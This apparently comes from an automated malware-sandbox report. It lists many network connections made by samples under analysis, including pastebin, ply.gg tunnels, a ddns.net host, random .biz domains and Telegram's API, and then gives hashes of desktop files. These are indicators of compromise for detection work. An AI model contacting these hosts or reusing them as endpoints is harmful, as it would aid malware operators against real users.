US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
RU 185.81.68.156:80 185.81.68.156 tcp
US 66.45.226.53:7777 tcp
HK 117.18.7.76:3782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
DE 147.28.185.29:80 tcp
US 104.20.4.235:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 3.70.228.168:555 tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
N/A 127.0.0.1:1504 tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 104.20.4.235:443 pastebin.com tcp
NL 206.166.251.4:8080 tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 66.45.226.53:7777 tcp
US 73.62.14.5:4782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
GB 89.197.154.116:80 89.197.154.116 tcp
US 104.20.4.235:443 pastebin.com tcp
TR 94.156.177.155:80 94.156.177.155 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
GB 89.197.154.116:7810 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
HK 117.18.7.76:3782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
CN 8.134.163.72:801 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 covery-mover.biz udp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
DE 3.70.228.168:555 tcp
KR 152.67.212.187:443 tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
FR 51.159.4.50:8080 tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:1504 tcp
VE 167.250.49.155:80 167.250.49.155 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 8.8.8.8:53 safe.ywxww.net udp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 8.8.8.8:53 microsoftsys.ddns.net udp
HK 117.18.7.76:3782 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 late-lil.at.ply.gg udp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
NL 89.110.69.103:80 89.110.69.103 tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:1504 tcp
N/A 127.0.0.1:5552 tcp
VN 14.243.221.170:3322 tcp
US 104.20.4.235:443 pastebin.com tcp
DE 167.235.70.96:8080 tcp
DE 3.70.228.168:555 tcp
RU 185.81.68.156:80 185.81.68.156 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 66.45.226.53:7777 tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
US 104.21.16.1:80 downsexv.com tcp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:1504 tcp
CN 103.24.179.18:7004 tcp
US 104.21.16.1:8080 downsexv.com tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
HK 117.18.7.76:3782 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 8.8.8.8:53 fivexx5ht.top udp
DE 185.218.125.157:21441 tcp
KR 152.67.212.187:443 tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 194.164.198.113:8080 tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 3.70.228.168:555 tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
N/A 127.0.0.1:5552 tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 73.62.14.5:4782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
N/A 127.0.0.1:5552 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 104.20.4.235:443 pastebin.com tcp
HK 117.18.7.76:3782 tcp
IT 185.225.73.67:1050 tcp
US 98.51.190.130:20 tcp
DE 185.218.125.157:21441 tcp
GB 132.145.17.167:9090 132.145.17.167 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
FR 91.134.82.79:443 i.ibb.co tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
GB 20.26.156.215:443 github.com tcp
DE 3.70.228.168:555 tcp
DE 209.38.221.184:8080 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
US 98.51.190.130:20 tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
DE 46.235.26.83:8080 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
US 98.51.190.130:20 tcp
RU 185.81.68.156:80 185.81.68.156 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
IT 185.225.73.67:1050 tcp
US 66.45.226.53:7777 tcp
HK 117.18.7.76:3782 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
KR 152.67.212.187:443 tcp
US 66.45.226.53:7777 tcp
DE 3.70.228.168:555 tcp
US 8.8.8.8:53 profile-indians.gl.at.ply.gg udp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 98.51.190.130:20 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
US 104.20.4.235:443 pastebin.com tcp
DE 147.28.185.29:80 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
IT 185.225.73.67:1050 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
NL 206.166.251.4:8080 tcp
US 98.51.190.130:20 tcp
US 104.20.4.235:443 pastebin.com tcp
HK 117.18.7.76:3782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 download.skycn.com udp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
CN 116.114.98.35:80 download.skycn.com tcp
N/A 192.168.56.1:4782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 98.51.190.130:20 tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
DE 3.70.228.168:555 tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 98.51.190.130:20 tcp
VN 14.243.221.170:3322 tcp
IT 185.225.73.67:1050 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 73.62.14.5:4782 tcp
FR 51.159.4.50:8080 tcp
US 66.45.226.53:7777 tcp
RU 185.215.113.66:80 185.215.113.66 tcp
HK 117.18.7.76:3782 tcp
US 66.45.226.53:7777 tcp
N/A 192.168.56.1:4782 tcp
N/A 127.0.0.1:1504 tcp
TR 94.156.177.33:80 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
DE 185.218.125.157:21441 tcp
RU 185.81.68.156:80 185.81.68.156 tcp
DE 3.70.228.168:555 tcp
US 98.51.190.130:20 tcp
US 66.45.226.53:7777 tcp
N/A 127.0.0.1:5552 tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
IT 185.225.73.67:1050 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
DE 167.235.70.96:8080 tcp
VN 14.243.221.170:3322 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 73.62.14.5:4782 tcp
DE 185.218.125.157:21441 tcp
US 66.45.226.53:7777 tcp
HK 117.18.7.76:3782 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
TR 94.156.177.33:80 tcp
KR 152.67.212.187:443 tcp
N/A 192.168.56.1:4782 tcp
US 66.45.226.53:7777 tcp
US 98.51.190.130:20 tcp
DE 3.70.228.168:555 tcp
N/A 127.0.0.1:5552 tcp
US 66.45.226.53:7777 tcp
DE 185.218.125.157:21441 tcp
IT 185.225.73.67:1050 tcp
DE 194.164.198.113:8080 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
VN 14.243.221.170:3322 tcp
US 73.62.14.5:4782 tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 98.51.190.130:20 tcp
US 66.45.226.53:7777 tcp
HK 117.18.7.76:3782 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
N/A 192.168.56.1:4782 tcp
US 66.45.226.53:7777 tcp
DE 3.70.228.168:555 tcp
DE 185.218.125.157:21441 tcp
GB 132.145.17.167:9090 132.145.17.167 tcp
IT 185.225.73.67:1050 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
NL 89.110.69.103:80 89.110.69.103 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 66.45.226.53:7777 tcp
US 98.51.190.130:20 tcp
RU 185.81.68.156:80 185.81.68.156 tcp
DE 185.218.125.157:21441 tcp
US 73.62.14.5:4782 tcp
VN 14.243.221.170:3322 tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
HK 117.18.7.76:3782 tcp
US 66.45.226.53:7777 tcp
US 98.51.190.130:20 tcp
N/A 192.168.56.1:4782 tcp

Files

C:\Users\Admin\Desktop\Microsoft Edge.lnk

MD5 cc7b4e1bf018d155945b3dec2fc29d49
SHA1 ea64874eec1e6972b824983e26c21d5b100912a2
SHA256 5407351ffefddd734369f1a360370ada4196f1a3686cfecd80bb184d4db81288
SHA512 a772fb14afbf0a8249c04295e53035eb7fdae0bc869e529d5ae1452887c2d64bd7f9dacef003f12858a6899ff823442074b00b7ac0dc53dff4f04d3385e4d64f

C:\Users\Public\Desktop\Microsoft Edge.lnk

MD5 602ca407fdc0646f96a0dfb0fb3eb76d
SHA1 eef6dab204532c90f405cd28a92e7b8026a1a210
SHA256 6086b0b6cd41f2bd7276549520b87ad95244a3a4cb9d4b45fef916249c9f5d6e
SHA512 2c878d61824523176482090f5189f4122c9c9877d30a443492cddc261343e9b388d7a29c79a280903598f01e20963a639d4356d5ebc0ed906e0a15d0e162d603

C:\Users\Public\Desktop\Acrobat Reader DC.lnk

MD5 215ec25271ca51b5323a7c3dd9aae784
SHA1 af4d9e5c2ddec9f17d48ae1be4400fe946a5f3e3
SHA256 08b3abb45e9a9a8ad92770067bf6c482ae3452477f0e73558e28872c12d1a05e
SHA512 94caf4773ac560ed8826fb47e8fba07eaecbf9c6528cecb8c1f18f208467abcb78039ce89880939c7f1d5374b0b5c03fa25642398f81e130be764467f8af3954

C:\Users\Public\Desktop\VLC media player.lnk

MD5 aa9ee5aadeea559d493b35b4f9fd073e
SHA1 69fb8e5d4db05db1ec30b13ea1ffefeb2d42ad37
SHA256 94ebb81085fffdc8c1def1f1f88cf016a95c5a43c08e45cd304c162a277b0d8a
SHA512 b2b50d1b4881075d6237c5cb2bb0a70c2a5496aae96d9e7766472894339f2093ac4f593b0ad8f30272193af819d76c32a3fa03ebc6dd664a88c2277f97d88310

C:\Users\Public\Desktop\Firefox.lnk

MD5 b1981659850590b997822df37d917bfb
SHA1 a5b65a89bd9145f00aacb1f52b3273e212f0b381
SHA256 ac49cc9d70283c74058cdc0fc68077b18ee3cd4cf9702e3d746e68b41b47a1e1
SHA512 b5abb283ee6fe345b673ee0a78ebddd54bf9208dfad44b04d0aeb58209e7ceae00d3ea948380a688b1939148c173b839f1e3edadcc910008694662c0b9a093ef

C:\Users\Admin\Desktop\RemoveReset.aifc

MD5 be3109dda8da7dc902ba5df388a6e3c2
SHA1 cade4c778609504e8cb836d866ed06570d2a71ec
SHA256 1a9e6a53cd824a9c7752197f321b86493be08df6cd2e8a8e47593060271d581b
SHA512 8a977734ed686b44e9da5945231db215bc0a25dca4f7c60b99b7e33ac070a2c42874af44f94b4daa776e8e398a86789f7aa52f4bb3524c0d16fc747edeeb0e0f

C:\Users\Admin\Desktop\BlockSubmit.ps1xml

MD5 a1a9242fadd7b3825b2068d3123f02ea
SHA1 c85108e4ded1c1b5037f8b70a8fb8f8f4dd0b090
SHA256 75589ab527b84637ab99e8232964286ec058b3876c53c2be0ede0af75aead076
SHA512 aad804f0a9153c5f39784a7148bc4157eea43809ab2bf3476c5b230c78b3f1d1b763083b07b8ac8c0f4d8a56fd3f96d22d53cc5dca4bc1a05c254f2659a056d6

C:\Users\Admin\Desktop\CheckpointUndo.vssx

MD5 f2b102ae2b95dc2c0f597109b84526ca
SHA1 2af599b839ae1ee03259ee0ac3df164e53a58eec
SHA256 b072be6b5ccf7cf1269047df7093fa6755a64091fb2dfac6f0dc471b98b13298
SHA512 efbb57d687828726c82dd68b3b78e0261ee689f429ccd87bfe54d1e6c3eb3dc1d8f99244559e376c07cb4bbb8b304b75acdec105644a8790eb0958ec76d0129e

C:\Users\Admin\Desktop\ClearStop.odt

MD5 3b133708c28f214046ca120674c2b869
SHA1 1131563efed560b11895d9053ab902db092adb0f
SHA256 0bde7f29bbc0d06a3a84116f3dc0546c3747c52fd5fd7b70442199f5a2047214
SHA512 cbd52e2db0a7b1eeb587003cbcb7c0ba454ffa1157c7836c4a60d7d723200b5e04a8f4450d2ef468524e238a24242a32e711786e775537ab6d12e9bdc2a7ef3e

C:\Users\Admin\Desktop\ConnectSwitch.xlsb

MD5 c16829dc4a6ee46731f9c69ad285cd55
SHA1 62e699ed2aa305d79c689516362145202b2ff703
SHA256 2188cf1138d116b5686948ad0bcc256279b778c34f9080df0c522954cf470eb0
SHA512 109d0055c258fdad90d74882eab09cc4c516736cf6af7b61354b955fcab96a126872797c19d8d91f4679010ec1fc701b0dbc8d1af9a2e0359d882a54fcb3ad4c

C:\Users\Admin\Desktop\CopySwitch.wmf

MD5 1ec753deaebfb5cd7096296fe5e9fc10
SHA1 86ca2ad50017598dd5198b351b1116f03d4daed8
SHA256 63d341bca97011679d1f49ee681867046021d8ec7497153097212f5efe34b3c9
SHA512 bb12688698cd5ac0e6cdcc5d07fc4e5bad6b9513a312d789c4ae6b253ec6dc6f61e77518445de0de8f92ef7975b78eaed307832fffdfb90971266ee827adb4a0

C:\Users\Admin\Desktop\DebugInitialize.eps

MD5 6b3eca8688b491c0537af9dee804adeb
SHA1 0b6e45d3e81de0e8210ab60ad9eee1f6053f7e41
SHA256 20009089e7765ad56af8a058e676f044ed5a53b1c2ea15192cd71294fa0874db
SHA512 a2dfc22baf4261a91c76541cd219ab50084b935cf5368be19419f07512c16949ae97e68ee73aaceb6693ea67181a2e0614730530dd2412aac511c967b2018e46

C:\Users\Admin\Desktop\DisconnectRevoke.ps1

MD5 e984225860e85407167c9d39334dee61
SHA1 2e5f9711eaba1f3e6fca25d8b21d16e102fa8979
SHA256 fa1f827bbd2cc1445815242014a5409605c3f2e742de1e4f3b87626049860782
SHA512 cf3e706d7903df585f6d8ae18c813eddfd5b435a5e1759ae622769b5ff9d0b50db56e74487b987bc097eb8b48e8c2125e710846446cc0572b3c95159ca492fde

C:\Users\Admin\Desktop\RepairResize.snd

MD5 c296bbd6cc5a56c6170fbc71b69d52c5
SHA1 11109b9ecae83771d5d183da8a40d07938458ac8
SHA256 2f55d55daeee7f0c980ca28c18f0e878f30375947be5c642e065978a33d6573e
SHA512 f97d8c306e8af919f7b179867bcf55a8f6efcce13c35b5a8c8e6c07bec97dbbd3ec684ed563ca7fb1f04ef9e39f2f42000734749c4100b3d85d5e68a1ad9dc6a

C:\Users\Admin\Desktop\RepairUnregister.emz

MD5 2022a3229437e4b3b4d4efe1f391ef0d
SHA1 99c01096460cb7e23e7a14462068fcb33b9c08e5
SHA256 605d84e459fc529abd7721b28926af51471206376e3b37f0407f0b554bb77100
SHA512 999f545ddb505289eec6d266462b202346ac8bd0d95e716bce082e1039c2e4add0544c9634d531d1330536be7c4c2913267a6adf1d7dde42a6cc5b92c99c2318

C:\Users\Admin\Desktop\ReadPop.eprtx

